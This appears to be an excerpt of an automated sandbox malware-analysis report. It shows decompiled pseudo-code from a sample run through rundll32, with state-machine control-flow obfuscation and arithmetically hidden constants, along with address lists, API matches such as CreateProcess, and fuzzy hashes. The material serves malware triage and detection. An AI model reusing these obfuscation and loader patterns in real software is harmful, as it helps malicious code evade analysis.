                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					if(_t439 == 0x9e65a83) {
                                                                                                                          						_push(_v1612);
                                                                                                                          						_push(_v1636);
                                                                                                                          						_push(_v1688);
                                                                                                                          						_push( &_v520); // executed
                                                                                                                          						E007A46BB(_v1672, _v1620); // executed
                                                                                                                          						E007ADA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
                                                                                                                          						_push(_v1564);
                                                                                                                          						_push(_v1580);
                                                                                                                          						E007947CE( &_v520, _v1684, _v1640, _v1596, _v1568, E007ADCF7(_v1640, 0x791140, __eflags),  &_v1040, _v1692, _v1632);
                                                                                                                          						_t395 = _v1584;
                                                                                                                          						E0079A8B0(_t395, _t375, _v1592);
                                                                                                                          						_t446 = _t446 - 0xc + 0x58;
                                                                                                                          						_t439 = 0x2f8e73a;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					_t457 = _t439 - 0xeef82b0;
                                                                                                                          					if(_t439 == 0xeef82b0) {
                                                                                                                          						_push(_v1696);
                                                                                                                          						_push(_v1652);
                                                                                                                          						_t381 = E0079B23C(_v1572, _v1576, E007ADCF7(_v1644, 0x7910c0, _t457), _v1600, _v1664,  &_v1560); // executed
                                                                                                                          						_t395 = _v1648;
                                                                                                                          						asm("sbb edi, edi");
                                                                                                                          						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
                                                                                                                          						E0079A8B0(_t395, _t379, _v1588);
                                                                                                                          						_t446 =  &(_t446[7]);
                                                                                                                          					}
                                                                                                                          					L20:
                                                                                                                          					if(_t439 != 0xdf158d7) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					goto L23;
                                                                                                                          				}
                                                                                                                          				E00794B61( &_v1560, 0x208, _v1616, _v1624);
                                                                                                                          				_pop(_t395);
                                                                                                                          				_t439 = 0x99a67ee;
                                                                                                                          				goto L20;
                                                                                                                          			}
                                                                                                                          0x0079faa4
                                                                                                                          0x0079faac
                                                                                                                          0x0079fab7
                                                                                                                          0x0079fabf
                                                                                                                          0x0079fac6
                                                                                                                          0x0079fad1
                                                                                                                          0x0079fae1
                                                                                                                          0x0079fae6
                                                                                                                          0x0079faf0
                                                                                                                          0x0079faf5
                                                                                                                          0x0079fafb
                                                                                                                          0x0079fb03
                                                                                                                          0x0079fb0b
                                                                                                                          0x0079fb18
                                                                                                                          0x0079fb1b
                                                                                                                          0x0079fb1f
                                                                                                                          0x0079fb27
                                                                                                                          0x0079fb2f
                                                                                                                          0x0079fb37
                                                                                                                          0x0079fb3f
                                                                                                                          0x0079fb47
                                                                                                                          0x0079fb4f
                                                                                                                          0x0079fb57
                                                                                                                          0x0079fb5f
                                                                                                                          0x0079fb6c
                                                                                                                          0x0079fb70
                                                                                                                          0x0079fb78
                                                                                                                          0x0079fb84
                                                                                                                          0x0079fb89
                                                                                                                          0x0079fb8f
                                                                                                                          0x0079fb93
                                                                                                                          0x0079fb9b
                                                                                                                          0x0079fba3
                                                                                                                          0x0079fbab
                                                                                                                          0x0079fbb3
                                                                                                                          0x0079fbc0
                                                                                                                          0x0079fbc3
                                                                                                                          0x0079fbc7
                                                                                                                          0x0079fbcf
                                                                                                                          0x0079fbd7
                                                                                                                          0x0079fbdf
                                                                                                                          0x0079fbe7
                                                                                                                          0x0079fbef
                                                                                                                          0x0079fbf7
                                                                                                                          0x0079fbff
                                                                                                                          0x0079fc04
                                                                                                                          0x0079fc0c
                                                                                                                          0x0079fc14
                                                                                                                          0x0079fc24
                                                                                                                          0x0079fc28
                                                                                                                          0x0079fc30
                                                                                                                          0x0079fc43
                                                                                                                          0x0079fc44
                                                                                                                          0x0079fc4b
                                                                                                                          0x0079fc56
                                                                                                                          0x0079fc61
                                                                                                                          0x0079fc6c
                                                                                                                          0x0079fc77
                                                                                                                          0x0079fc87
                                                                                                                          0x0079fc91
                                                                                                                          0x0079fc96
                                                                                                                          0x0079fc9c
                                                                                                                          0x0079fca4
                                                                                                                          0x0079fcac
                                                                                                                          0x0079fcb4
                                                                                                                          0x0079fcb9
                                                                                                                          0x0079fcc1
                                                                                                                          0x0079fccc
                                                                                                                          0x0079fcd7
                                                                                                                          0x0079fce2
                                                                                                                          0x0079fcea
                                                                                                                          0x0079fcf6
                                                                                                                          0x0079fcf9
                                                                                                                          0x0079fcfd
                                                                                                                          0x0079fd05
                                                                                                                          0x0079fd0d
                                                                                                                          0x0079fd1a
                                                                                                                          0x0079fd1e
                                                                                                                          0x0079fd23
                                                                                                                          0x0079fd2b
                                                                                                                          0x0079fd36
                                                                                                                          0x0079fd3e
                                                                                                                          0x0079fd49
                                                                                                                          0x0079fd51
                                                                                                                          0x0079fd59
                                                                                                                          0x0079fd61
                                                                                                                          0x0079fd69
                                                                                                                          0x0079fd6e
                                                                                                                          0x0079fd76
                                                                                                                          0x0079fd7b
                                                                                                                          0x0079fd83
                                                                                                                          0x0079fd8b
                                                                                                                          0x0079fd93
                                                                                                                          0x0079fd9b
                                                                                                                          0x0079fda8
                                                                                                                          0x0079fdac
                                                                                                                          0x0079fdb4
                                                                                                                          0x0079fdbc
                                                                                                                          0x0079fdc4
                                                                                                                          0x0079fdcc
                                                                                                                          0x0079fdd4
                                                                                                                          0x0079fddc
                                                                                                                          0x0079fde0
                                                                                                                          0x0079fdf2
                                                                                                                          0x0079ffd1
                                                                                                                          0x0079ffd5
                                                                                                                          0x0079ffd6
                                                                                                                          0x0079ffd7
                                                                                                                          0x0079ffd8
                                                                                                                          0x0079ffd9
                                                                                                                          0x0079ffe8
                                                                                                                          0x0079ffe9
                                                                                                                          0x0079fff3
                                                                                                                          0x0079fff3
                                                                                                                          0x0079fff7
                                                                                                                          0x007a0000
                                                                                                                          0x007a0000
                                                                                                                          0x0079fdfe
                                                                                                                          0x0079ff5e
                                                                                                                          0x0079ff60
                                                                                                                          0x0079ff64
                                                                                                                          0x0079ff99
                                                                                                                          0x0079ff99
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079ff66
                                                                                                                          0x0079ff66
                                                                                                                          0x0079ff66
                                                                                                                          0x0079ff6a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079ff6c
                                                                                                                          0x0079ff81
                                                                                                                          0x0079ff81
                                                                                                                          0x0079ff84
                                                                                                                          0x0079ff87
                                                                                                                          0x0079ff8a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079ff75
                                                                                                                          0x0079ff79
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079ff7b
                                                                                                                          0x0079ff7e
                                                                                                                          0x0079ff7e
                                                                                                                          0x0079ff7e
                                                                                                                          0x0079ff8c
                                                                                                                          0x0079ff8c
                                                                                                                          0x0079ff8e
                                                                                                                          0x0079ff91
                                                                                                                          0x0079ff91
                                                                                                                          0x0079ff94
                                                                                                                          0x0079ff94
                                                                                                                          0x00000000
                                                                                                                          0x0079ff66
                                                                                                                          0x0079fe0a
                                                                                                                          0x0079ff52
                                                                                                                          0x0079ff54
                                                                                                                          0x00000000
                                                                                                                          0x0079ff54
                                                                                                                          0x0079fe16
                                                                                                                          0x0079fe8f
                                                                                                                          0x0079fe9a
                                                                                                                          0x0079fe9e
                                                                                                                          0x0079fead
                                                                                                                          0x0079feae
                                                                                                                          0x0079fecf
                                                                                                                          0x0079fed4
                                                                                                                          0x0079fee0
                                                                                                                          0x0079ff22
                                                                                                                          0x0079ff2e
                                                                                                                          0x0079ff37
                                                                                                                          0x0079ff3c
                                                                                                                          0x0079ff3f
                                                                                                                          0x00000000
                                                                                                                          0x0079ff3f
                                                                                                                          0x0079fe18
                                                                                                                          0x0079fe1e
                                                                                                                          0x0079fe24
                                                                                                                          0x0079fe2d
                                                                                                                          0x0079fe5e
                                                                                                                          0x0079fe6a
                                                                                                                          0x0079fe74
                                                                                                                          0x0079fe7c
                                                                                                                          0x0079fe82
                                                                                                                          0x0079fe87
                                                                                                                          0x0079fe87
                                                                                                                          0x0079ffc3
                                                                                                                          0x0079ffc9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079ffcf
                                                                                                                          0x0079ffb7
                                                                                                                          0x0079ffbd
                                                                                                                          0x0079ffbe
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FolderPath
                                                                                                                          • String ID: '+=$PG&$Qec$RYt$oq$wpc$zn $Y
                                                                                                                          • API String ID: 1514166925-385937
                                                                                                                          • Opcode ID: 876d2dc88ead2b25d36b54b895e865d59165060fb2897e50947993244aa4c21c
                                                                                                                          • Instruction ID: ef1c5dcd9484d2fa89f26482f1c5582fc736270248cffe6c4b645b028807eda8
                                                                                                                          • Opcode Fuzzy Hash: 876d2dc88ead2b25d36b54b895e865d59165060fb2897e50947993244aa4c21c
                                                                                                                          • Instruction Fuzzy Hash: 740220725083809FD768CF25D58AA1BBBE2FBC5718F108A1DF19986260D7B98949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 267 79e991-79ea60 268 79ea90-79ea96 267->268 269 79ea62-79ea77 call 79f8fd 267->269 269->268 272 79ea79-79ea88 call 7993ed 269->272 274 79ea8d 272->274 274->268
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			_entry_(intOrPtr _a4, char _a8) {
                                                                                                                          				unsigned int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				intOrPtr _v44;
                                                                                                                          				signed int _t85;
                                                                                                                          				signed int _t86;
                                                                                                                          				signed int _t87;
                                                                                                                          
                                                                                                                          				_v32 = _v32 & 0x00000000;
                                                                                                                          				_v44 = 0xa88528;
                                                                                                                          				_v40 = 0x811176;
                                                                                                                          				_v36 = 0xed2c64;
                                                                                                                          				_v20 = 0x893932;
                                                                                                                          				_v20 = _v20 ^ 0x2faf083b;
                                                                                                                          				_v20 = _v20 ^ 0x2f2d1c53;
                                                                                                                          				_v8 = 0xbe2d1;
                                                                                                                          				_t85 = 0x2e;
                                                                                                                          				_v8 = _v8 / _t85;
                                                                                                                          				_v8 = _v8 >> 0xd;
                                                                                                                          				_v8 = _v8 + 0xffff961f;
                                                                                                                          				_v8 = _v8 ^ 0xfff451d0;
                                                                                                                          				_v16 = 0x50855f;
                                                                                                                          				_v16 = _v16 >> 8;
                                                                                                                          				_t86 = 0x5e;
                                                                                                                          				_v16 = _v16 / _t86;
                                                                                                                          				_v16 = _v16 ^ 0x0002614f;
                                                                                                                          				_v28 = 0x752e5d;
                                                                                                                          				_t36 =  &_v28; // 0x752e5d
                                                                                                                          				_t87 = 0x4e;
                                                                                                                          				_v28 =  *_t36 * 0x6f;
                                                                                                                          				_v28 = _v28 ^ 0x32c1ec83;
                                                                                                                          				_v12 = 0xba9db2;
                                                                                                                          				_v12 = _v12 * 0x41;
                                                                                                                          				_v12 = _v12 + 0xfc46;
                                                                                                                          				_v12 = _v12 | 0x4911db39;
                                                                                                                          				_v12 = _v12 ^ 0x6f7f0271;
                                                                                                                          				_v24 = 0x2e0372;
                                                                                                                          				_v24 = _v24 / _t87;
                                                                                                                          				_v24 = _v24 ^ 0x000c7ca5;
                                                                                                                          				_t58 =  &_a8;
                                                                                                                          				 *_t58 = _a8 - 1;
                                                                                                                          				if( *_t58 == 0) {
                                                                                                                          					 *0x7b320c = _a4;
                                                                                                                          					if(E0079F8FD() != 0) {
                                                                                                                          						E007993ED(); // executed
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return 1;
                                                                                                                          			}

















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID: ].u$d,
                                                                                                                          • API String ID: 621844428-1507873175
                                                                                                                          • Opcode ID: d840cdebee310378de32332cb97d476b5c1b2d7d0980ef3207748004bec7701d
                                                                                                                          • Instruction ID: ebdbae3ff9736719d60ed384afda86bfdc5e407ac562c14582305a7a902906e9
                                                                                                                          • Opcode Fuzzy Hash: d840cdebee310378de32332cb97d476b5c1b2d7d0980ef3207748004bec7701d
                                                                                                                          • Instruction Fuzzy Hash: 6B31F471D00209EBDF08DFA4D98A5EEBBF0FB54304F208199D510BB250D7B45B859F80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 288 79ab87-79ad94 call 7a20b9 call 794b61 call 797f5d 294 79ad99-79ad9e 288->294 295 79addd 294->295 296 79ada0-79ada2 294->296 297 79addf-79ade5 295->297 298 79adb0-79addb call 7a1e67 * 2 296->298 299 79ada4-79adaa 296->299 300 79adab-79adae 298->300 299->300 300->297
                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E0079AB87(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                          				void* _t151;
                                                                                                                          				void* _t163;
                                                                                                                          				void* _t164;
                                                                                                                          				signed int _t169;
                                                                                                                          				signed int _t170;
                                                                                                                          				signed int _t171;
                                                                                                                          				intOrPtr _t187;
                                                                                                                          				intOrPtr _t190;
                                                                                                                          				intOrPtr* _t193;
                                                                                                                          				void* _t194;
                                                                                                                          
                                                                                                                          				_t193 = _t194 - 0x5c;
                                                                                                                          				_push( *((intOrPtr*)(_t193 + 0x7c)));
                                                                                                                          				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
                                                                                                                          				_push( *((intOrPtr*)(_t193 + 0x78)));
                                                                                                                          				_push(0);
                                                                                                                          				_push( *((intOrPtr*)(_t193 + 0x70)));
                                                                                                                          				_push(_t187);
                                                                                                                          				_push( *((intOrPtr*)(_t193 + 0x68)));
                                                                                                                          				_push( *((intOrPtr*)(_t193 + 0x64)));
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t151);
                                                                                                                          				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
                                                                                                                          				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
                                                                                                                          				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
                                                                                                                          				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
                                                                                                                          				 *(_t193 + 0x34) = 0xb35e3d;
                                                                                                                          				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
                                                                                                                          				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
                                                                                                                          				 *(_t193 + 0x1c) = 0xb39a57;
                                                                                                                          				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
                                                                                                                          				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
                                                                                                                          				 *(_t193 + 0x54) = 0x8cfebd;
                                                                                                                          				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
                                                                                                                          				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
                                                                                                                          				_t169 = 0x1d;
                                                                                                                          				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
                                                                                                                          				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
                                                                                                                          				 *(_t193 + 0x24) = 0xadd23a;
                                                                                                                          				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
                                                                                                                          				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
                                                                                                                          				 *(_t193 + 0x20) = 0x1d5481;
                                                                                                                          				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
                                                                                                                          				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
                                                                                                                          				 *(_t193 + 0x2c) = 0x3c40b3;
                                                                                                                          				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
                                                                                                                          				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
                                                                                                                          				 *(_t193 + 0x3c) = 0x52e0cb;
                                                                                                                          				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
                                                                                                                          				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
                                                                                                                          				 *(_t193 + 0x4c) = 0x46a878;
                                                                                                                          				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
                                                                                                                          				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
                                                                                                                          				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
                                                                                                                          				 *(_t193 + 0x30) = 0x13da24;
                                                                                                                          				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
                                                                                                                          				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
                                                                                                                          				 *(_t193 + 0x44) = 0xdb90c5;
                                                                                                                          				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
                                                                                                                          				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
                                                                                                                          				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
                                                                                                                          				 *(_t193 + 0x38) = 0xc3d0db;
                                                                                                                          				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
                                                                                                                          				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
                                                                                                                          				 *(_t193 + 0x58) = 0x1a470a;
                                                                                                                          				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
                                                                                                                          				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
                                                                                                                          				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
                                                                                                                          				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
                                                                                                                          				 *(_t193 + 0x40) = 0xc6f633;
                                                                                                                          				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
                                                                                                                          				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
                                                                                                                          				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
                                                                                                                          				 *(_t193 + 0x50) = 0xa2e0bb;
                                                                                                                          				_t170 = 0x56;
                                                                                                                          				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
                                                                                                                          				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
                                                                                                                          				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
                                                                                                                          				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
                                                                                                                          				 *(_t193 + 0x28) = 0x4b9267;
                                                                                                                          				_t171 = 0x28;
                                                                                                                          				_t115 = _t193 - 0x48; // 0x181c8bbc
                                                                                                                          				_t172 = _t115;
                                                                                                                          				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
                                                                                                                          				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
                                                                                                                          				 *(_t193 + 0x48) = 0xd50758;
                                                                                                                          				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
                                                                                                                          				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
                                                                                                                          				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
                                                                                                                          				_push( *(_t193 + 0x1c));
                                                                                                                          				_push( *(_t193 + 0x34));
                                                                                                                          				_t190 = 0x44;
                                                                                                                          				E00794B61(_t115, _t190);
                                                                                                                          				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
                                                                                                                          				_t129 = _t193 - 4; // 0x181c8c00
                                                                                                                          				_t131 = _t193 - 0x48; // 0x181c8bbc
                                                                                                                          				_t163 = E00797F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
                                                                                                                          				if(_t163 == 0) {
                                                                                                                          					_t164 = 0;
                                                                                                                          				} else {
                                                                                                                          					if(_t187 == 0) {
                                                                                                                          						E007A1E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
                                                                                                                          						E007A1E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
                                                                                                                          					} else {
                                                                                                                          						asm("movsd");
                                                                                                                          						asm("movsd");
                                                                                                                          						asm("movsd");
                                                                                                                          						asm("movsd");
                                                                                                                          					}
                                                                                                                          					_t164 = 1;
                                                                                                                          				}
                                                                                                                          				return _t164;
                                                                                                                          				}

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID: nJQ
                                                                                                                          • API String ID: 963392458-2884827605
                                                                                                                          • Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                          • Instruction ID: 836d03d4b16704169ad780032871f3b1473072ce1fa1b1b4266b9b91947d41f8
                                                                                                                          • Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                          • Instruction Fuzzy Hash: D471F272500288EBCF59CFA4D9498CE3BA2FF48358F108119FE1696224D3B6C969DF85
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                          APIs
                                                                                                                          • _malloc.LIBCMT ref: 10006A9C
                                                                                                                            • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                            • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                            • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 501242067-0
                                                                                                                          • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                          • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                          • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                          • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                          • GlobalHandle.KERNEL32(00247AB8), ref: 100208A9
                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                          • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                          • GlobalHandle.KERNEL32(00247AB8), ref: 100208DB
                                                                                                                          • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                          • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                          • _memset.LIBCMT ref: 10020911
                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 496899490-0
                                                                                                                          • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                          • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                          • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                          • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • __lock.LIBCMT ref: 1002FA87
                                                                                                                            • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                            • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                            • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
